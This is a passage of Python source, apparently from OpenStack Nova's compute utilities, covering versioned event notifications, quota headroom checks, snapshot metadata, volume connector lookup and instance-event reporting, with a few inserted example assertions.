:param phase: the phase of the action
:param source: the source of the notification
:param exception: the thrown exception (used in error notifications)
:param bdms: BlockDeviceMappingList object for the instance. If it is not
provided then we will load it from the db if so configured
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionPayload(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
notification = instance_notification.InstanceActionNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=source),
event_type=notification_base.EventType(
object='instance',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_create(context, instance, host, phase=None,
exception=None, bdms=None):
"""Send versioned notification about instance creation
:param context: the request context
:param instance: the instance being created
:param host: the host emitting the notification
:param phase: the phase of the creation
:param exception: the thrown exception (used in error notifications)
:param bdms: BlockDeviceMappingList object for the instance. If it is not
provided then we will load it from the db if so configured
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceCreatePayload(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
notification = instance_notification.InstanceCreateNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.CREATE,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_scheduler_action(context, request_spec, action, phase=None,
source=fields.NotificationSource.SCHEDULER):
"""Send versioned notification about the action made by the scheduler
:param context: the RequestContext object
:param request_spec: the RequestSpec object
:param action: the name of the action
:param phase: the phase of the action
:param source: the source of the notification
"""
payload = reqspec_notification.RequestSpecPayload(
request_spec=request_spec)
notification = scheduler_notification.SelectDestinationsNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=source),
event_type=notification_base.EventType(
object='scheduler',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_volume_attach_detach(context, instance, host, action, phase,
volume_id=None, exception=None):
"""Send versioned notification about the action made on the instance
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param action: the name of the action
:param phase: the phase of the action
:param volume_id: id of the volume will be attached
:param exception: the thrown exception (used in error notifications)
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionVolumePayload(
context=context,
instance=instance,
fault=fault,
volume_id=volume_id)
notification = instance_notification.InstanceActionVolumeNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_rescue_action(context, instance, host,
rescue_image_ref, phase=None,
exception=None):
"""Send versioned notification about the action made on the instance
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param rescue_image_ref: the rescue image ref
:param phase: the phase of the action
:param exception: the thrown exception (used in error notifications)
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionRescuePayload(
context=context,
instance=instance,
fault=fault,
rescue_image_ref=rescue_image_ref)
notification = instance_notification.InstanceActionRescueNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.RESCUE,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_keypair_action(context, keypair, action, phase):
"""Send versioned notification about the keypair action on the instance
:param context: the request context
:param keypair: the keypair which the action performed on
:param action: the name of the action
:param phase: the phase of the action
"""
payload = keypair_notification.KeypairPayload(keypair=keypair)
notification = keypair_notification.KeypairNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='keypair',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_volume_swap(context, instance, host, phase,
old_volume_id, new_volume_id, exception=None):
"""Send versioned notification about the volume swap action
on the instance
:param context: the request context
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param phase: the phase of the action
:param old_volume_id: the ID of the volume that is copied from and detached
:param new_volume_id: the ID of the volume that is copied to and attached
:param exception: an exception
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionVolumeSwapPayload(
context=context,
instance=instance,
fault=fault,
old_volume_id=old_volume_id,
new_volume_id=new_volume_id)
instance_notification.InstanceActionVolumeSwapNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.VOLUME_SWAP,
phase=phase),
payload=payload).emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_snapshot(context, instance, host, phase,
snapshot_image_id):
"""Send versioned notification about the snapshot action executed on the
instance
:param context: the request context
:param instance: the instance from which a snapshot image is being created
:param host: the host emitting the notification
:param phase: the phase of the action
:param snapshot_image_id: the ID of the snapshot
"""
payload = instance_notification.InstanceActionSnapshotPayload(
context=context,
instance=instance,
fault=None,
snapshot_image_id=snapshot_image_id)
instance_notification.InstanceActionSnapshotNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.SNAPSHOT,
phase=phase),
payload=payload).emit(context)
@rpc.if_notifications_enabled
def notify_about_resize_prep_instance(context, instance, host, phase,
new_flavor):
"""Send versioned notification about the instance resize action
on the instance
:param context: the request context
:param instance: the instance which the resize action performed on
:param host: the host emitting the notification
:param phase: the phase of the action
:param new_flavor: new flavor
"""
payload = instance_notification.InstanceActionResizePrepPayload(
context=context,
instance=instance,
fault=None,
new_flavor=flavor_notification.FlavorPayload(flavor=new_flavor))
instance_notification.InstanceActionResizePrepNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.RESIZE_PREP,
phase=phase),
payload=payload).emit(context)
def notify_about_server_group_update(context, event_suffix, sg_payload):
"""Send a notification about server group update.
:param event_suffix: Event type like "create.start" or "create.end"
:param sg_payload: payload for server group update
"""
notifier = rpc.get_notifier(service='servergroup')
notifier.info(context, 'servergroup.%s' % event_suffix, sg_payload)
def notify_about_aggregate_update(context, event_suffix, aggregate_payload):
"""Send a notification about aggregate update.
:param event_suffix: Event type like "create.start" or "create.end"
:param aggregate_payload: payload for aggregate update
"""
aggregate_identifier = aggregate_payload.get('aggregate_id', None)
if not aggregate_identifier:
aggregate_identifier = aggregate_payload.get('name', None)
if not aggregate_identifier:
LOG.debug("No aggregate id or name specified for this "
"notification and it will be ignored")
return
notifier = rpc.get_notifier(service='aggregate',
host=aggregate_identifier)
notifier.info(context, 'aggregate.%s' % event_suffix, aggregate_payload)
@rpc.if_notifications_enabled
def notify_about_aggregate_action(context, aggregate, action, phase):
payload = aggregate_notification.AggregatePayload(aggregate)
notification = aggregate_notification.AggregateNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='aggregate',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_aggregate_cache(context, aggregate, host, image_status,
index, total):
"""Send a notification about aggregate cache_images progress.
:param context: The RequestContext
:param aggregate: The target aggregate
:param host: The host within the aggregate for which to report status
:param image_status: The result from the compute host, which is a dict
of {image_id: status}
:param index: An integer indicating progress toward completion, between
1 and $total
:param total: The total number of hosts being processed in this operation,
to bound $index
"""
success_statuses = ('cached', 'existing')
payload = aggregate_notification.AggregateCachePayload(aggregate,
host,
index,
total)
payload.images_cached = []
payload.images_failed = []
for img, status in image_status.items():
if status in success_statuses:
payload.images_cached.append(img)
else:
payload.images_failed.append(img)
notification = aggregate_notification.AggregateCacheNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.CONDUCTOR),
event_type=notification_base.EventType(
object='aggregate',
action=fields.NotificationAction.IMAGE_CACHE,
phase=fields.NotificationPhase.PROGRESS),
payload=payload)
notification.emit(context)
def notify_about_host_update(context, event_suffix, host_payload):
"""Send a notification about host update.
:param event_suffix: Event type like "create.start" or "create.end"
:param host_payload: payload for host update. It is a dict and there
should be at least the 'host_name' key in this
dict.
"""
host_identifier = host_payload.get('host_name')
if not host_identifier:
LOG.warning("No host name specified for the notification of "
"HostAPI.%s and it will be ignored", event_suffix)
return
notifier = rpc.get_notifier(service='api', host=host_identifier)
notifier.info(context, 'HostAPI.%s' % event_suffix, host_payload)
@rpc.if_notifications_enabled
def notify_about_server_group_action(context, group, action):
payload = sg_notification.ServerGroupPayload(group)
notification = sg_notification.ServerGroupNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='server_group',
action=action),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_server_group_add_member(context, group_id):
group = objects.InstanceGroup.get_by_uuid(context, group_id)
payload = sg_notification.ServerGroupPayload(group)
notification = sg_notification.ServerGroupNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='server_group',
action=fields.NotificationAction.ADD_MEMBER),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_rebuild(context, instance, host,
action=fields.NotificationAction.REBUILD,
phase=None,
source=fields.NotificationSource.COMPUTE,
exception=None, bdms=None):
"""Send versioned notification about instance rebuild
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param action: the name of the action
:param phase: the phase of the action
:param source: the source of the notification
:param exception: the thrown exception (used in error notifications)
:param bdms: BlockDeviceMappingList object for the instance. If it is not
provided then we will load it from the db if so configured
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionRebuildPayload(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
notification = instance_notification.InstanceActionRebuildNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=source),
event_type=notification_base.EventType(
object='instance',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_metrics_update(context, host, host_ip, nodename,
monitor_metric_list):
"""Send versioned notification about updating metrics
:param context: the request context
:param host: the host emitting the notification
:param host_ip: the IP address of the host
:param nodename: the node name
:param monitor_metric_list: the MonitorMetricList object
"""
payload = metrics_notification.MetricsPayload(
host=host,
host_ip=host_ip,
nodename=nodename,
monitor_metric_list=monitor_metric_list)
notification = metrics_notification.MetricsNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='metrics',
action=fields.NotificationAction.UPDATE),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_libvirt_connect_error(context, ip, exception):
"""Send a versioned notification about libvirt connect error.
:param context: the request context
:param ip: the IP address of the host
:param exception: the thrown exception
"""
fault, _ = _get_fault_and_priority_from_exception(exception)
payload = libvirt_notification.LibvirtErrorPayload(ip=ip, reason=fault)
notification = libvirt_notification.LibvirtErrorNotification(
priority=fields.NotificationPriority.ERROR,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='libvirt',
action=fields.NotificationAction.CONNECT,
phase=fields.NotificationPhase.ERROR),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_volume_usage(context, vol_usage, host):
"""Send versioned notification about the volume usage
:param context: the request context
:param vol_usage: the volume usage object
:param host: the host emitting the notification
"""
payload = volume_notification.VolumeUsagePayload(
vol_usage=vol_usage)
notification = volume_notification.VolumeUsageNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='volume',
action=fields.NotificationAction.USAGE),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_compute_task_error(context, action, instance_uuid,
request_spec, state, exception):
"""Send a versioned notification about compute task error.
:param context: the request context
:param action: the name of the action
:param instance_uuid: the UUID of the instance
    :param request_spec: the request spec object or a dict that includes
        request spec information
    :param state: the vm state of the instance
    :param exception: the thrown exception
"""
if (request_spec is not None and
not isinstance(request_spec, objects.RequestSpec)):
request_spec = objects.RequestSpec.from_primitives(
context, request_spec, {})
fault, _ = _get_fault_and_priority_from_exception(exception)
payload = task_notification.ComputeTaskPayload(
instance_uuid=instance_uuid, request_spec=request_spec, state=state,
reason=fault)
notification = task_notification.ComputeTaskNotification(
priority=fields.NotificationPriority.ERROR,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.CONDUCTOR),
event_type=notification_base.EventType(
object='compute_task',
action=action,
phase=fields.NotificationPhase.ERROR),
payload=payload)
notification.emit(context)
def refresh_info_cache_for_instance(context, instance):
"""Refresh the info cache for an instance.
:param instance: The instance object.
"""
if instance.info_cache is not None and not instance.deleted:
# Catch the exception in case the instance got deleted after the check
# instance.deleted was executed
try:
instance.info_cache.refresh()
except exception.InstanceInfoCacheNotFound:
LOG.debug("Can not refresh info_cache because instance "
"was not found", instance=instance)
def get_reboot_type(task_state, current_power_state):
"""Checks if the current instance state requires a HARD reboot."""
if current_power_state != power_state.RUNNING:
return 'HARD'
if task_state in task_states.soft_reboot_states:
return 'SOFT'
return 'HARD'
def get_machine_ips():
"""Get the machine's ip addresses
:returns: list of Strings of ip addresses
"""
addresses = []
for interface in netifaces.interfaces():
try:
iface_data = netifaces.ifaddresses(interface)
for family in iface_data:
if family not in (netifaces.AF_INET, netifaces.AF_INET6):
continue
for address in iface_data[family]:
addr = address['addr']
# If we have an ipv6 address remove the
# %ether_interface at the end
if family == netifaces.AF_INET6:
addr = addr.split('%')[0]
addresses.append(addr)
except ValueError:
pass
return addresses
def upsize_quota_delta(new_flavor, old_flavor):
"""Calculate deltas required to adjust quota for an instance upsize.
:param new_flavor: the target instance type
:param old_flavor: the original instance type
"""
def _quota_delta(resource):
return (new_flavor[resource] - old_flavor[resource])
deltas = {}
if _quota_delta('vcpus') > 0:
deltas['cores'] = _quota_delta('vcpus')
if _quota_delta('memory_mb') > 0:
deltas['ram'] = _quota_delta('memory_mb')
return deltas
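# NOTE: illustrative sketch only, not part of the original module. It shows
# the delta math above with made-up flavor values; plain dicts are enough
# because upsize_quota_delta only indexes 'vcpus' and 'memory_mb'.
_example_old_flavor = {'vcpus': 2, 'memory_mb': 2048}
_example_new_flavor = {'vcpus': 4, 'memory_mb': 1024}
# Only positive deltas are counted, so the RAM shrink adds no 'ram' key.
assert upsize_quota_delta(_example_new_flavor, _example_old_flavor) == {
    'cores': 2}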
def get_headroom(quotas, usages, deltas):
headroom = {res: quotas[res] - usages[res]
for res in quotas.keys()}
# If quota_cores is unlimited [-1]:
# - set cores headroom based on instances headroom:
if quotas.get('cores') == -1:
if deltas.get('cores'):
hc = headroom.get('instances', 1) * deltas['cores']
headroom['cores'] = hc / deltas.get('instances', 1)
else:
headroom['cores'] = headroom.get('instances', 1)
# If quota_ram is unlimited [-1]:
# - set ram headroom based on instances headroom:
if quotas.get('ram') == -1:
if deltas.get('ram'):
hr = headroom.get('instances', 1) * deltas['ram']
headroom['ram'] = hr / deltas.get('instances', 1)
else:
headroom['ram'] = headroom.get('instances', 1)
return headroom
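# NOTE: illustrative sketch only, not part of the original module, with
# made-up numbers. When no quota is unlimited (-1), headroom is simply
# quota minus usage for each resource.
_example_quotas = {'instances': 10, 'cores': 20, 'ram': 51200}
_example_usages = {'instances': 4, 'cores': 8, 'ram': 8192}
_example_deltas = {'instances': 1, 'cores': 2, 'ram': 2048}
assert get_headroom(_example_quotas, _example_usages, _example_deltas) == {
    'instances': 6, 'cores': 12, 'ram': 43008}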
def check_num_instances_quota(
context, flavor, min_count, max_count, project_id=None, user_id=None,
orig_num_req=None,
):
"""Enforce quota limits on number of instances created."""
# project_id is also used for the TooManyInstances error message
if project_id is None:
project_id = context.project_id
if user_id is None:
user_id = context.user_id
# Check whether we need to count resources per-user and check a per-user
# quota limit. If we have no per-user quota limit defined for a
# project/user, we can avoid wasteful resource counting.
user_quotas = objects.Quotas.get_all_by_project_and_user(
context, project_id, user_id)
if not any(r in user_quotas for r in ['instances', 'cores', 'ram']):
user_id = None
# Determine requested cores and ram
req_cores = max_count * flavor.vcpus
req_ram = max_count * flavor.memory_mb
deltas = {'instances': max_count, 'cores': req_cores, 'ram': req_ram}
try:
        # NOTE(johngarbutt) when using unified limits, this call is a no-op,
        # and as such, this function always returns max_count
objects.Quotas.check_deltas(context, deltas,
project_id, user_id=user_id,
check_project_id=project_id,
check_user_id=user_id)
except exception.OverQuota as exc:
quotas = exc.kwargs['quotas']
overs = exc.kwargs['overs']
usages = exc.kwargs['usages']
# This is for the recheck quota case where we used a delta of zero.
if min_count == max_count == 0:
# orig_num_req is the original number of instances requested in the
# case of a recheck quota, for use in the over quota exception.
req_cores = orig_num_req * flavor.vcpus
req_ram = orig_num_req * flavor.memory_mb
requested = {'instances': orig_num_req, 'cores': req_cores,
'ram': req_ram}
(overs, reqs, total_alloweds, useds) = get_over_quota_detail(
deltas, overs, quotas, requested)
msg = "Cannot run any more instances of this type."
params = {'overs': overs, 'pid': project_id, 'msg': msg}
LOG.debug("%(overs)s quota exceeded for %(pid)s. %(msg)s",
params)
raise exception.TooManyInstances(overs=overs,
req=reqs,
used=useds,
allowed=total_alloweds)
# OK, we exceeded quota; let's figure out why...
headroom = get_headroom(quotas, usages, deltas)
allowed = headroom.get('instances', 1)
# Reduce 'allowed' instances in line with the cores & ram headroom
if flavor.vcpus:
allowed = min(allowed, headroom['cores'] // flavor.vcpus)
if flavor.memory_mb:
allowed = min(allowed, headroom['ram'] // flavor.memory_mb)
# Convert to the appropriate exception message
if allowed <= 0:
msg = "Cannot run any more instances of this type."
elif min_count <= allowed <= max_count:
# We're actually OK, but still need to check against allowed
return check_num_instances_quota(
context, flavor, min_count, allowed, project_id=project_id,
user_id=user_id)
else:
msg = "Can only run %s more instances of this type." % allowed
num_instances = (str(min_count) if min_count == max_count else
"%s-%s" % (min_count, max_count))
requested = dict(instances=num_instances, cores=req_cores,
ram=req_ram)
(overs, reqs, total_alloweds, useds) = get_over_quota_detail(
headroom, overs, quotas, requested)
params = {'overs': overs, 'pid': project_id,
'min_count': min_count, 'max_count': max_count,
'msg': msg}
if min_count == max_count:
LOG.debug("%(overs)s quota exceeded for %(pid)s,"
" tried to run %(min_count)d instances. "
"%(msg)s", params)
else:
LOG.debug("%(overs)s quota exceeded for %(pid)s,"
" tried to run between %(min_count)d and"
" %(max_count)d instances. %(msg)s",
params)
raise exception.TooManyInstances(overs=overs,
req=reqs,
used=useds,
allowed=total_alloweds)
return max_count
def get_over_quota_detail(headroom, overs, quotas, requested):
reqs = []
useds = []
total_alloweds = []
for resource in overs:
reqs.append(str(requested[resource]))
useds.append(str(quotas[resource] - headroom[resource]))
total_alloweds.append(str(quotas[resource]))
(overs, reqs, useds, total_alloweds) = map(', '.join, (
overs, reqs, useds, total_alloweds))
return overs, reqs, total_alloweds, useds
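# NOTE: illustrative sketch only, not part of the original module. The helper
# just renders comma-separated requested/allowed/used strings for the
# resources listed in `overs`; all numbers below are made up.
_example_headroom = {'instances': 0, 'cores': 12, 'ram': 43008}
_example_over_quotas = {'instances': 10, 'cores': 20, 'ram': 51200}
_example_requested = {'instances': 3, 'cores': 6, 'ram': 6144}
# Returns (overs, reqs, total_alloweds, useds), each as a joined string.
assert get_over_quota_detail(
    _example_headroom, ['instances'], _example_over_quotas,
    _example_requested) == ('instances', '3', '10', '10')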
def remove_shelved_keys_from_system_metadata(instance):
# Delete system_metadata for a shelved instance
for key in ['shelved_at', 'shelved_image_id', 'shelved_host']:
if key in instance.system_metadata:
del (instance.system_metadata[key])
def create_image(context, instance, name, image_type, image_api,
extra_properties=None):
"""Create new image entry in the image service. This new image
will be reserved for the compute manager to upload a snapshot
or backup.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param name: string for name of the snapshot
:param image_type: snapshot | backup
:param image_api: instance of nova.image.glance.API
:param extra_properties: dict of extra image properties to include
"""
properties = {
'instance_uuid': instance.uuid,
'user_id': str(context.user_id),
'image_type': image_type,
}
properties.update(extra_properties or {})
image_meta = initialize_instance_snapshot_metadata(
context, instance, name, properties)
# if we're making a snapshot, omit the disk and container formats,
# since the image may have been converted to another format, and the
# original values won't be accurate. The driver will populate these
# with the correct values later, on image upload.
if image_type == 'snapshot':
image_meta.pop('disk_format', None)
image_meta.pop('container_format', None)
return image_api.create(context, image_meta)
def initialize_instance_snapshot_metadata(context, instance, name,
extra_properties=None):
"""Initialize new metadata for a snapshot of the given instance.
:param context: authenticated RequestContext; note that this may not
be the owner of the instance itself, e.g. an admin creates a
snapshot image of some user instance
:param instance: nova.objects.instance.Instance object
:param name: string for name of the snapshot
:param extra_properties: dict of extra metadata properties to include
:returns: the new instance snapshot metadata
"""
image_meta = utils.get_image_from_system_metadata(
instance.system_metadata)
image_meta['name'] = name
# If the user creating the snapshot is not in the same project as
# the owner of the instance, then the image visibility should be
# "shared" so the owner of the instance has access to the image, like
# in the case of an admin creating a snapshot of another user's
# server, either directly via the createImage API or via shelve.
extra_properties = extra_properties or {}
if context.project_id != instance.project_id:
# The glance API client-side code will use this to add the
# instance project as a member of the image for access.
image_meta['visibility'] = 'shared'
extra_properties['instance_owner'] = instance.project_id
# TODO(mriedem): Should owner_project_name and owner_user_name
# be removed from image_meta['properties'] here, or added to
# [DEFAULT]/non_inheritable_image_properties? It is confusing
# otherwise to see the owner project not match those values.
else:
# The request comes from the owner of the instance so make the
# image private.
image_meta['visibility'] = 'private'
# Delete properties that are non-inheritable
properties = image_meta['properties']
keys_to_pop = set(CONF.non_inheritable_image_properties).union(
NON_INHERITABLE_IMAGE_PROPERTIES)
for ns in NON_INHERITABLE_IMAGE_NAMESPACES:
keys_to_pop |= {key for key in properties
if key.startswith(ns)}
for key in keys_to_pop:
properties.pop(key, None)
# The properties in extra_properties have precedence
properties.update(extra_properties)
return image_meta
def delete_image(context, instance, image_api, image_id, log_exc_info=False):
"""Deletes the image if it still exists.
Ignores ImageNotFound if the image is already gone.
:param context: the nova auth request context where the context.project_id
matches the owner of the image
:param instance: the instance for which the snapshot image was created
:param image_api: the image API used to delete the image
:param image_id: the ID of the image to delete
:param log_exc_info: True if this is being called from an exception handler
block and traceback should be logged at DEBUG level, False otherwise.
"""
LOG.debug("Cleaning up image %s", image_id, instance=instance,
log_exc_info=log_exc_info)
try:
image_api.delete(context, image_id)
except exception.ImageNotFound:
        # Since we're trying to clean up an image, we don't care
        # if it's already gone.
pass
except Exception:
LOG.exception("Error while trying to clean up image %s",
image_id, instance=instance)
def may_have_ports_or_volumes(instance):
"""Checks to see if an instance may have ports or volumes based on vm_state
This is primarily only useful when instance.host is None.
:param instance: The nova.objects.Instance in question.
    :returns: True if the instance may have ports or volumes, False otherwise
"""
# NOTE(melwitt): When an instance build fails in the compute manager,
# the instance host and node are set to None and the vm_state is set
    # to ERROR. In that case, the instance with host = None has actually
# been scheduled and may have ports and/or volumes allocated on the
# compute node.
if instance.vm_state in (vm_states.SHELVED_OFFLOADED, vm_states.ERROR):
return True
return False
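# NOTE: illustrative sketch only, not part of the original module. The check
# looks solely at vm_state, so a SimpleNamespace stand-in for an Instance is
# enough to demonstrate it; `types` is imported here just for the example.
import types as _example_types
assert may_have_ports_or_volumes(
    _example_types.SimpleNamespace(vm_state=vm_states.ERROR)) is True
assert may_have_ports_or_volumes(
    _example_types.SimpleNamespace(vm_state=vm_states.ACTIVE)) is False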
def get_stashed_volume_connector(bdm, instance):
"""Lookup a connector dict from the bdm.connection_info if set
Gets the stashed connector dict out of the bdm.connection_info if set
and the connector host matches the instance host.
:param bdm: nova.objects.block_device.BlockDeviceMapping
:param instance: nova.objects.instance.Instance
:returns: volume connector dict or None
"""
if 'connection_info' in bdm and bdm.connection_info is not None:
# NOTE(mriedem): We didn't start stashing the connector in the
# bdm.connection_info until Mitaka so it might not be there on old
# attachments. Also, if the volume was attached when the instance
# was in shelved_offloaded state and it hasn't been unshelved yet
# we don't have the attachment/connection information either.
connector = jsonutils.loads(bdm.connection_info).get('connector')
if connector:
if connector.get('host') == instance.host:
return connector
LOG.debug('Found stashed volume connector for instance but '
'connector host %(connector_host)s does not match '
'the instance host %(instance_host)s.',
{'connector_host': connector.get('host'),
'instance_host': instance.host}, instance=instance)
if (instance.host is None and
may_have_ports_or_volumes(instance)):
LOG.debug('Allowing use of stashed volume connector with '
'instance host None because instance with '
'vm_state %(vm_state)s has been scheduled in '
'the past.', {'vm_state': instance.vm_state},
instance=instance)
return connector
class EventReporter(object):
"""Context manager to report instance action events.
If constructed with ``graceful_exit=True`` the __exit__ function will
handle and not re-raise on InstanceActionNotFound.
"""
def __init__(self, context, event_name, host, *instance_uuids,
graceful_exit=False):
self.context = context
self.event_name = event_name
self.instance_uuids = instance_uuids
self.host = host
self.graceful_exit = graceful_exit
def __enter__(self):
for uuid in self.instance_uuids:
objects.InstanceActionEvent.event_start(
self.context, uuid, self.event_name, want_result=False,
host=self.host)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
for uuid in self.instance_uuids:
try:
objects.InstanceActionEvent.event_finish_with_failure(
self.context, uuid, self.event_name, exc_val=exc_val,
exc_tb=exc_tb, want_result=False)
except exception.InstanceActionNotFound:
# If the instance action was not found then determine if we
# should re-raise based on the graceful_exit attribute.
with excutils.save_and_reraise_exception(
reraise=not self.graceful_exit):
if self.graceful_exit:
return True
return False
def wrap_instance_event(prefix, graceful_exit=False):
"""Wraps a method to log the event taken on the instance, and result.
This decorator wraps a method to log the start and result of an event, as
part of an action taken on an instance.
:param prefix: prefix for the event name, usually a service binary like
"compute" or "conductor" to indicate the origin of the event.
:param graceful_exit: True if the decorator should gracefully handle
InstanceActionNotFound errors, False otherwise. This should rarely be
True.
"""
@utils.expects_func_args('instance')
def helper(function):
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = safe_utils.get_wrapped_function(function)
keyed_args = inspect.getcallargs(wrapped_func, self, context,
*args, **kwargs)
instance_uuid = keyed_args['instance']['uuid']
event_name = '{0}_{1}'.format(prefix, function.__name__)
host = self.host if hasattr(self, 'host') else None
with EventReporter(context, event_name, host, instance_uuid,
graceful_exit=graceful_exit):
return function(self, context, *args, **kwargs)
return decorated_function
return helper
class UnlimitedSemaphore(object):
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
@property
def balance(self):
return 0
# This semaphore is used to enforce a limit on disk-IO-intensive operations
# (image downloads, image conversions) at any given time.
# It is initialized at ComputeManager.init_host()
disk_ops_semaphore = UnlimitedSemaphore()
@contextlib.contextmanager
def notify_about_instance_delete(notifier, context, instance,
delete_type='delete',
source=fields.NotificationSource.API):
try:
notify_about_instance_usage(notifier, context, instance,
"%s.start" % delete_type)
# Note(gibi): force_delete types will be handled in a
# subsequent patch
if delete_type in ['delete', 'soft_delete']:
notify_about_instance_action(
context,
instance,
host=CONF.host,
source=source,
action=delete_type,
phase=fields.NotificationPhase.START)
yield
finally:
notify_about_instance_usage(notifier, context, instance,
"%s.end" % delete_type)
if delete_type in ['delete', 'soft_delete']:
notify_about_instance_action(
context,
instance,
host=CONF.host,
source=source,
action=delete_type,
phase=fields.NotificationPhase.END)
def update_pci_request_spec_with_allocated_interface_name(
context, report_client, pci_requests, provider_mapping):
"""Update the instance's PCI request based on the request group -
resource provider mapping and the device RP name from placement.
:param context: the request context
:param report_client: a SchedulerReportClient instance
:param pci_requests: A list of InstancePCIRequest objects to be updated
:param provider_mapping: the request group - resource provider mapping
in the form returned by the RequestSpec.get_request_group_mapping()
call.
    :raises AmbiguousResourceProviderForPCIRequest: if more than one
        resource provider provides resources for the given PCI request.
    :raises UnexpectedResourceProviderNameForPCIRequest: if the resource
        provider that provides resources for the PCI request does not have a
        well formatted name, so we cannot parse the parent interface name
        out of it.
"""
if not pci_requests:
return
def needs_update(pci_request, mapping):
return (pci_request.requester_id and
pci_request.requester_id in mapping)
for pci_request in pci_requests:
if needs_update(pci_request, provider_mapping):
provider_uuids = provider_mapping[pci_request.requester_id]
if len(provider_uuids) != 1:
raise exception.AmbiguousResourceProviderForPCIRequest(
providers=provider_uuids,
requester=pci_request.requester_id)
dev_rp_name = report_client.get_resource_provider_name(
context,
provider_uuids[0])
# NOTE(gibi): the device RP name reported by neutron is
# structured like <hostname>:<agentname>:<interfacename>
rp_name_pieces = dev_rp_name.split(':')
if len(rp_name_pieces) != 3:
ex = exception.UnexpectedResourceProviderNameForPCIRequest
raise ex(
provider=provider_uuids[0],
requester=pci_request.requester_id,
provider_name=dev_rp_name)
for spec in pci_request.spec:
spec['parent_ifname'] = rp_name_pieces[2]
def delete_arqs_if_needed(context, instance, arq_uuids=None):
"""Delete Cyborg ARQs for the instance.
    :param context: the request context
    :param instance: the instance that owns the ARQs
    :param arq_uuids: UUIDs of ARQs to delete because they are not yet bound
        to the instance
"""
cyclient = cyborg.get_client(context)
dp_name = instance.flavor.extra_specs.get('accel:device_profile')
if dp_name:
LOG.debug('Calling Cyborg to delete ARQs for instance %(instance)s',
{'instance': instance.uuid})
try:
